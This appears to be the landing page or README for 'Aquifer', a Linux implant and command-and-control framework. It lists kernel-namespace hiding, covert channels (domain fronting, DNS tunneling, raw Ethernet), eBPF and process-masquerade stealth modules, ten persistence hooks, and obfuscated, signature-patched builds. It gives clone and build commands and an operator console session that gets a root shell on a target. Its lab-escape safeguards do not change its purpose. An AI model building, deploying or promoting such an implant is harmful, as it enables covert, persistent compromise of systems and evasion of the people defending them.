Kernel namespace isolation turns the OS against its own defenses. Multi-channel C2 with polymorphic beacons. 36 stealth modules for deep host-level blending.
# Build and deploy $ make build-release garble -literals -tiny -seed=random build ... UPX compressed: 8.2MB → 3.1MB PASS: No Go module paths found PASS: High binary entropy (7.98) # C2 operator console $ python3 -m c2server --db c2.db --keys server_keys.pem aquifer> sessions ID Hostname Transport Last Seen 1 target-01 HTTPS 2s ago
Namespace isolation as the foundation. Every capability designed for deep host-level blending and operational security.
PID + Mount + Network + UTS + Cgroup namespaces with veth pair routing, NAT masquerade, and DNAT loopback for host connectivity. The implant operates in its own kernel-enforced sandbox invisible to the host.
Four independent channels with automatic failover. HTTPS with domain fronting and JA3 randomization. DNS tunneling via TXT records. DNS-over-HTTPS. Raw Layer 2 Ethernet frames below netfilter/iptables.
18 rotating paths, 8 content-types, 13 user-agents, randomized headers per cycle. JA3 fingerprint randomization per session. Traffic shaping mimics legitimate browsing.
eBPF cloaking, fileless execution via memfd_create, kernel keyring secrets, anti-dump regions, io_uring covert I/O, process masquerade, cgroup camouflage, and more.
Systemd generators, NSS modules, logrotate hooks, DHCP client hooks, APT hooks, audit dispatcher, binfmt_misc, modprobe hooks, NM dispatcher, and sysctl.d tunables.
Hostname, CIDR, MAC, machine ID, canary file, and kill date prevent lab escape. Auto-terminates and cleans up outside target environment.
Memory encryption with XOR rekeying. Core dump prevention. Anti-ptrace. Environment scrubbing. Thread count reduction. I/O noise injection. Binary self-deletion.
36 modules for deep host-level blending. Every aspect of the implant footprint is managed.
Two-stage execution with compile-time configuration. Parent validates, child operates inside isolated namespaces.
PID + Mount + Network + UTS + Cgroup isolation. Veth pair routing with NAT masquerade and DNAT loopback. Host-side cleanup on exit via parent signal handler.
Four channels with automatic failover: HTTPS (domain fronting, JA3), DNS (TXT records), DoH, Raw L2 (AF_PACKET). ECDH key exchange + AES-256-GCM.
36 stealth modules in pkg/stealth/. eBPF cloaking, fileless execution, kernel keyring, io_uring, anti-dump, process genealogy, cgroup camouflage.
10 advanced methods beyond cron/systemd. Systemd generators, NSS modules, logrotate, DHCP, APT, audit, binfmt_misc, modprobe, NM dispatcher, sysctl.d.
Multiple build profiles. Production builds include garble obfuscation, UPX compression, and signature patching.
$ git clone https://github.com/Real-Fruit-Snacks/Aquifer.git $ cd Aquifer # Development build (stripped, static) $ make build # Obfuscated build $ make build-garble # Production release $ make build-release garble + UPX + signature patching
# Start C2 operator console $ pip install -r c2server/requirements.txt $ python3 -m c2server --db c2.db --keys server_keys.pem # Interact with implant aquifer> sessions ID Hostname Transport Last Seen 1 target-01 HTTPS 2s ago aquifer[1]> shell whoami root
ps aux, top, htop — process masquerade/proc/PID/environ — direct memory zeroing/proc/PID/maps — region name spoofinglsof — FD spoofing via bind mounts